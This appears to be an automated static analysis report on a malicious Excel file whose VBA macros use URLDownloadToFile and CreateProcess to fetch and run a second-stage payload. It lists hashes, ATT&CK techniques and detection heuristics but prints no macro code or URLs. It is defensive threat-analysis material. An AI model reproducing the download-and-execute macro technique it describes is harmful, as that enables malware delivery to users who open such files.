Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 d39aaa321588e8b1…

MALICIOUS

Office (OLE) / .XLS

68.5 KB Created: 2022-03-22 08:56:04 First seen: 2022-03-22
MD5: 14542a3509c7fbc2888a5962ee69e07c SHA-1: 35b25bf8995b84ce155e35b8d878d89a39d14ecd SHA-256: d39aaa321588e8b1e8fe694732b533be31c57b60a3c1b7cf73047974606c0c64
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1059.003 Windows Command Shell

The sample is an XLS file containing VBA macros. The macros utilize the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload from a remote location. The presence of CreateProcess API references further supports the execution of downloaded content. While specific URLs are not directly visible in the provided script excerpt, the critical heuristic firings strongly suggest this malicious behavior.

Heuristics 5

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
c886030597a4a1b5a7c3b418d496c6caa71a748b840bf880273ad521505f7226		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 10344 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.